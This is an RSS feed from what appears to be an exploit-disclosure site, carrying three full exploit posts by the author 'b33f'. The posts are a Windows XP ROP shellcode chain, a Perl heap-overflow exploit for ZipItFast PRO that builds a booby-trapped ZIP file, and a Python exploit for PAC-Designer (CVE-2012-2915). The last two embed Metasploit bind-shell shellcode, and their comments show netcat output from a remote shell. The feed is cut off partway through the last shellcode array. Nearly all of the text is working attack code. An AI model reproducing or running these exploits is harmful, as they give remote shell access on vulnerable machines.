<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Exploit-ID &#187; b33f</title>
	<atom:link href="http://www.exploit-id.com/authors/b33f/feed" rel="self" type="application/rss+xml" />
	<link>http://www.exploit-id.com</link>
	<description>Exploit Information Disclosure</description>
	<lastBuildDate>Tue, 30 Apr 2013 03:02:28 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=228</generator>
		<item>
		<title>Windows XP PRO SP3 &#8211; Full ROP calc shellcode</title>
		<link>http://www.exploit-id.com/shellcode/windows-xp-pro-sp3-full-rop-calc-shellcode</link>
		<comments>http://www.exploit-id.com/shellcode/windows-xp-pro-sp3-full-rop-calc-shellcode#comments</comments>
		<pubDate>Fri, 21 Dec 2012 09:49:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Shellcode]]></category>
		<category><![CDATA[b33f]]></category>

		<guid isPermaLink="false">http://www.exploit-id.com/?p=10037</guid>
		<description><![CDATA[?View Code WINDOWS/* Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode Author: b33f (http://www.fuzzysecurity.com/) Notes: This is probably not the most efficient way but I gave the dll's a run for their money ;)) Greets: Donato, Jahmel &#160; OS-DLL's used: Base &#124; Top &#124; Size &#124; Version (Important!) ___________&#124;____________&#124;____________&#124;_____________________________ 0x7c800000 &#124; 0x7c8f6000 &#124; [...]]]></description>
			<content:encoded><![CDATA[
<div class="wp_codebox_msgheader"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p10037code2'); return false;">View Code</a> WINDOWS</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p100372"><td class="code" id="p10037code2"><pre class="windows" style="font-family:monospace;">/*
    Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode
    Author: b33f (http://www.fuzzysecurity.com/)
    Notes: This is probably not the most efficient way but
           I gave the dll's a run for their money ;))
    Greets: Donato, Jahmel
&nbsp;
    OS-DLL's used:
       Base    |    Top     |   Size     |    Version (Important!)
    ___________|____________|____________|_____________________________
    0x7c800000 | 0x7c8f6000 | 0x000f6000 | 5.1.2600.5781 [kernel32.dll]
    0x7c900000 | 0x7c9b2000 | 0x000b2000 | 5.1.2600.6055 [ntdll.dll]
    0x7e410000 | 0x7e4a1000 | 0x00091000 | 5.1.2600.5512 [USER32.dll]
&nbsp;
    UINT WINAPI WinExec(            =&gt; PTR to WinExec
      __in  LPCSTR lpCmdLine,       =&gt; C:\WINDOWS\system32\calc.exe+00000000
      __in  UINT uCmdShow           =&gt; 0x1
    );
*/
&nbsp;
#include &lt;iostream&gt;
#include &quot;windows.h&quot;
&nbsp;
char shellcode[]=
&quot;\xb1\x4f\x97\x7c&quot;  // POP ECX # RETN
&quot;\xf9\x10\x47\x7e&quot;  // Writable PTR USER32.dll
&quot;\x27\xfa\x87\x7c&quot;  // POP EDX # POP EAX # RETN
&quot;\x43\x3a\x5c\x57&quot;  // ASCII &quot;C:\W&quot;
&quot;\x49\x4e\x44\x4f&quot;  // ASCII &quot;INDO&quot;
&quot;\x04\x18\x80\x7c&quot;  // MOV DWORD PTR DS:[ECX],EDX # MOV DWORD PTR DS:[ECX+4],EAX # POP EBP # RETN 04
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\xe5\x02\x88\x7c&quot;  // POP EAX # RETN
&quot;\x57\x53\x5c\x73&quot;  // ASCII &quot;WS\s&quot;
&quot;\x38\xd6\x46\x7e&quot;  // MOV DWORD PTR DS:[ECX+8],EAX # POP ESI # POP EBP # RETN 08
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\xe5\x02\x88\x7c&quot;  // POP EAX # RETN
&quot;\x79\x73\x74\x65&quot;  // ASCII &quot;yste&quot;
&quot;\xcb\xbe\x45\x7e&quot;  // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\xe5\x02\x88\x7c&quot;  // POP EAX # RETN
&quot;\x63\x61\x6c\x63&quot;  // ASCII &quot;calc&quot;
&quot;\x31\xa9\x91\x7c&quot;  // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\xe5\x02\x88\x7c&quot;  // POP EAX # RETN
&quot;\x6d\x33\x32\x5c&quot;  // ASCII &quot;m32\&quot;
&quot;\xcb\xbe\x45\x7e&quot;  // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\xe5\x02\x88\x7c&quot;  // POP EAX # RETN
&quot;\x2e\x65\x78\x65&quot;  // ASCII &quot;.exe&quot;
&quot;\x31\xa9\x91\x7c&quot;  // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\x9e\x2e\x92\x7c&quot;  // XOR EAX,EAX # RETN
&quot;\x31\xa9\x91\x7c&quot;  // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
&quot;\xee\x4c\x97\x7c&quot;  // DEC ECX # RETN
//-------------------------------------------[&quot;C:\WINDOWS\system32\calc.exe+00000000&quot; -&gt; ecx]-//
&quot;\xe5\x02\x88\x7c&quot;  // POP EAX # RETN
&quot;\x7a\xeb\xc3\x6f&quot;  // Should result in a valid PTR in kernel32.dll
&quot;\x4f\xda\x85\x7c&quot;  // PUSH ESP # ADC BYTE PTR DS:[EAX+CC4837C],AL # XOR EAX,EAX # INC EAX # POP EDI # POP EBP # RETN 08
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x32\xd9\x44\x7e&quot;  // XCHG EAX,EDI # RETN
&quot;\x62\x28\x97\x7c&quot;  // ADD EAX,20 # POP EBP # RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x62\x28\x97\x7c&quot;  // ADD EAX,20 # POP EBP # RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x62\x28\x97\x7c&quot;  // ADD EAX,20 # POP EBP # RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x62\x28\x97\x7c&quot;  // ADD EAX,20 # POP EBP # RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
//-----------------------------------------------------------[Save Stack Pointer + pivot eax]-//
&quot;\xd6\xd1\x95\x7c&quot;  // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x33\x80\x97\x7c&quot;  // INC EAX # RETN
&quot;\x33\x80\x97\x7c&quot;  // INC EAX # RETN
&quot;\x33\x80\x97\x7c&quot;  // INC EAX # RETN
&quot;\x33\x80\x97\x7c&quot;  // INC EAX # RETN
&quot;\xf5\xd6\x91\x7c&quot;  // XOR ECX,ECX # RETN
&quot;\x07\x3d\x96\x7c&quot;  // INC ECX # RETN
&quot;\xd6\xd1\x95\x7c&quot;  // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\xb1\x4f\x97\x7c&quot;  // POP ECX # RETN
&quot;\xed\x2a\x86\x7c&quot;  // WinExec()
&quot;\xe7\xc1\x87\x7c&quot;  // MOV DWORD PTR DS:[EAX+4],ECX # XOR EAX,EAX # POP EBP # RETN 04
&quot;\x8a\x20\x87\x7c&quot;  // Compensate POP
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Compensate RETN
&quot;\x8a\x20\x87\x7c&quot;  // Final RETN for WinExec()
&quot;\x8a\x20\x87\x7c&quot;; // Compensate WinExec()
//------------------------------------------------------[Write Arguments and execute -&gt; calc]-//
&nbsp;
void buff() {
	char a;
	memcpy((&amp;a)+5, shellcode, sizeof(shellcode)); // Compiler dependent, works with Dev-C++ 4.9
}
&nbsp;
int main()
{
    LoadLibrary(&quot;USER32.dll&quot;); // we need this dll
	char buf[1024];
	buff();
	return 0;
}</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.exploit-id.com/shellcode/windows-xp-pro-sp3-full-rop-calc-shellcode/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>ZipItFast PRO v3.0 Heap Overflow Exploit</title>
		<link>http://www.exploit-id.com/local-exploits/zipitfast-pro-v3-0-heap-overflow-exploit</link>
		<comments>http://www.exploit-id.com/local-exploits/zipitfast-pro-v3-0-heap-overflow-exploit#comments</comments>
		<pubDate>Thu, 19 Jul 2012 15:03:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Local Exploits]]></category>
		<category><![CDATA[b33f]]></category>

		<guid isPermaLink="false">http://www.exploit-id.com/?p=9382</guid>
		<description><![CDATA[?View Code WINDOWS#!/usr/bin/perl &#160; #---------------------------------------------------------------------------# # Exploit: ZipItFast PRO v3.0 Heap-Overflow # # Author: b33f - http://www.fuzzysecurity.com/ # # OS: Windows XP SP1 # # DOS POC: C4SS!0 G0M3S =&#62; http://www.exploit-db.com/exploits/17512/ # # Software: http://www.exploit-db.com/wp-content/themes/exploit/ # # applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe # #---------------------------------------------------------------------------# # Sorry for reinventing the wheel but learning about heap-overflows # # requires you to [...]]]></description>
			<content:encoded><![CDATA[
<div class="wp_codebox_msgheader"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p9382code4'); return false;">View Code</a> WINDOWS</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p93824"><td class="code" id="p9382code4"><pre class="windows" style="font-family:monospace;">#!/usr/bin/perl
&nbsp;
#---------------------------------------------------------------------------#
# Exploit: ZipItFast PRO v3.0 Heap-Overflow                                 #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows XP SP1                                                        #
# DOS POC: C4SS!0 G0M3S =&gt; http://www.exploit-db.com/exploits/17512/        #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/            #
#           applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe  #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows         #
# requires you to take a step back and roll with the punches not unlike     #
# watching a David Lynch production ;))...                                  #
#                                                                           #
# - &quot;Who is that lady with the log?&quot;                                        #
# + &quot;We call her the log-lady..&quot;                                            #
#---------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.131 9988                                    #
# (UNKNOWN) [192.168.111.131] 9988 (?) open                                 #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Documents and Settings\Owner\Desktop&gt;                                  #
#---------------------------------------------------------------------------#
&nbsp;
use strict;
use warnings;
&nbsp;
my $filename = &quot;Exploit.zip&quot;;
&nbsp;
my $head = 
&quot;\x50\x4B\x03\x04\x14\x00\x00&quot;.
&quot;\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00&quot;.
&quot;\x00\x00\x00\x00\x00\x00\x00\x00&quot;.
&quot;\xe4\x0f&quot;.
&quot;\x00\x00\x00&quot;;
&nbsp;
my $head2 = 
&quot;\x50\x4B\x01\x02\x14\x00\x14&quot;.
&quot;\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00&quot;.
&quot;\x00\x00\x00\x00\x00\x00\x00\x00\x00&quot;.
&quot;\xe4\x0f&quot;.
&quot;\x00\x00\x00\x00\x00\x00\x01\x00&quot;.
&quot;\x24\x00\x00\x00\x00\x00\x00\x00&quot;;
&nbsp;
my $head3 = 
&quot;\x50\x4B\x05\x06\x00\x00\x00&quot;.
&quot;\x00\x01\x00\x01\x00&quot;.
&quot;\x12\x10\x00\x00&quot;.
&quot;\x02\x10\x00\x00&quot;.
&quot;\x00\x00&quot;;
&nbsp;
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
my $ph33r = 
&quot;\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49&quot; .
&quot;\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51&quot; .
&quot;\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32&quot; .
&quot;\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41&quot; .
&quot;\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70&quot; .
&quot;\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44&quot; .
&quot;\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b&quot; .
&quot;\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37&quot; .
&quot;\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c&quot; .
&quot;\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31&quot; .
&quot;\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52&quot; .
&quot;\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c&quot; .
&quot;\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50&quot; .
&quot;\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68&quot; .
&quot;\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53&quot; .
&quot;\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56&quot; .
&quot;\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f&quot; .
&quot;\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54&quot; .
&quot;\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45&quot; .
&quot;\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73&quot; .
&quot;\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c&quot; .
&quot;\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70&quot; .
&quot;\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61&quot; .
&quot;\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f&quot; .
&quot;\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78&quot; .
&quot;\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53&quot; .
&quot;\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46&quot; .
&quot;\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70&quot; .
&quot;\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49&quot; .
&quot;\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70&quot; .
&quot;\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48&quot; .
&quot;\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69&quot; .
&quot;\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50&quot; .
&quot;\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66&quot; .
&quot;\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f&quot; .
&quot;\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68&quot; .
&quot;\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48&quot; .
&quot;\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77&quot; .
&quot;\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31&quot; .
&quot;\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30&quot; .
&quot;\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66&quot; .
&quot;\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56&quot; .
&quot;\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d&quot; .
&quot;\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74&quot; .
&quot;\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e&quot; .
&quot;\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c&quot; .
&quot;\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e&quot; .
&quot;\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77&quot; .
&quot;\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75&quot; .
&quot;\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d&quot; .
&quot;\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70&quot; .
&quot;\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63&quot; .
&quot;\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45&quot; .
&quot;\x41\x41&quot;;
&nbsp;
my $buf1 = &quot;A&quot; x 4064 . &quot;.txt&quot;;
&nbsp;
#################
# EAX =&gt; 256-bytes =&gt; 0x77fc3210 - 0x04 =&gt; 0x77fc320c (_VECTORED_EXCEPTION_NODE)
# EDX =&gt; 260-bytes =&gt; 0x0012FA28 - 0x08 =&gt; 0x0012FA20 (PTR shellcode)
# Jump over Blink and Flink =&gt; EB 0A
#################
my $magic = &quot;\xEB\x0A&quot; . &quot;\x0C\x32\xFC\x77&quot; . &quot;\x20\xFA\x12\x00&quot;;
&nbsp;
##################
# Notice that the offsets don't correspond exactly. I experienced some buffer
# expansion and compression depending on the buffer structure so keep that in
# mind if you want to do some testing.
#
# Remember to set Anti-Debugging flags in your debugger..
# (immunity = &gt; !hidedebug All_Debug)
##################
my $buf2 = &quot;\x90&quot; x 253 . $magic . &quot;A&quot; x 300 . $ph33r . &quot;A&quot; x 2756 . &quot;.txt&quot;;
&nbsp;
my $zip = $head.$buf1.$head2.$buf2.$head3;
open(FILE,&quot;&gt;$filename&quot;) || die &quot;[-]Error:\n$!\n&quot;;
print FILE $zip;
close(FILE);</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.exploit-id.com/local-exploits/zipitfast-pro-v3-0-heap-overflow-exploit/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit</title>
		<link>http://www.exploit-id.com/local-exploits/lattice-semiconductor-pac-designer-6-21-pac-exploit</link>
		<comments>http://www.exploit-id.com/local-exploits/lattice-semiconductor-pac-designer-6-21-pac-exploit#comments</comments>
		<pubDate>Fri, 08 Jun 2012 03:14:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Local Exploits]]></category>
		<category><![CDATA[b33f]]></category>

		<guid isPermaLink="false">http://www.exploit-id.com/?p=8917</guid>
		<description><![CDATA[?View Code WINDOWS#!/usr/bin/python -w &#160; #------------------------------------------------------------------------------------# # Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) # # CVE: CVE-2012-2915 # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/ # # OS: WinXP SP1 # # Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm # #------------------------------------------------------------------------------------# # I didn't dig to deep but it seems portability to other OS builds is not promising [...]]]></description>
			<content:encoded><![CDATA[
<div class="wp_codebox_msgheader"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p8917code6'); return false;">View Code</a> WINDOWS</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p89176"><td class="code" id="p8917code6"><pre class="windows" style="font-family:monospace;">#!/usr/bin/python -w
&nbsp;
#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions)           #
# CVE: CVE-2012-2915                                                                 #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                        #
# OS: WinXP SP1                                                                      #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
#------------------------------------------------------------------------------------#
# I didn't dig to deep but it seems portability to other OS builds is not promising  #
# due to SafeSEH and badchars in the application modules.                            #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988                                             #
#  (UNKNOWN) [192.168.111.130] 9988 (?) open                                         #
#  Microsoft Windows XP [Version 5.1.2600]                                           #
#  (C) Copyright 1985-2001 Microsoft Corp.                                           #
#                                                                                    #
#  C:\Documents and Settings\Owner\Desktop&gt;                                          #
#------------------------------------------------------------------------------------#
&nbsp;
filename=&quot;evil.PAC&quot;
&nbsp;
PAC1 = &quot;&quot;&quot;&lt;?xml version=&quot;1.0&quot;?&gt;
&nbsp;
&lt;PacDesignData&gt;
&nbsp;
&lt;DocFmtVersion&gt;1&lt;/DocFmtVersion&gt;
&lt;DeviceType&gt;ispPAC-CLK5410D&lt;/DeviceType&gt;
&nbsp;
&lt;CreatedBy&gt;PAC-Designer 6.21.1336&lt;/CreatedBy&gt;
&nbsp;
&lt;SummaryInformation&gt;
&lt;Title&gt;Oops..&lt;/Title&gt;
&lt;Author&gt;b33f&lt;/Author&gt;
&lt;/SummaryInformation&gt;
&nbsp;
&lt;SymbolicSchematicData&gt;
  &lt;Symbol&gt;
    &lt;SymKey&gt;153&lt;/SymKey&gt;
    &lt;NameText&gt;Profile 0 Ref Frequency&lt;/NameText&gt;
    &lt;Value&gt;&quot;&quot;&quot;
&nbsp;
#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c  #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)                          #
#------------------------------------------------------------------------------------#
shellcode = (
&quot;\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49&quot;
&quot;\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a&quot;
&quot;\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32&quot;
&quot;\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49&quot;
&quot;\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b&quot;
&quot;\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30&quot;
&quot;\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33&quot;
&quot;\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f&quot;
&quot;\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46&quot;
&quot;\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62&quot;
&quot;\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30&quot;
&quot;\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35&quot;
&quot;\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72&quot;
&quot;\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43&quot;
&quot;\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74&quot;
&quot;\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d&quot;
&quot;\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73&quot;
&quot;\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78&quot;
&quot;\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66&quot;
&quot;\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b&quot;
&quot;\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74&quot;
&quot;\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f&quot;
&quot;\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d&quot;
&quot;\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48&quot;
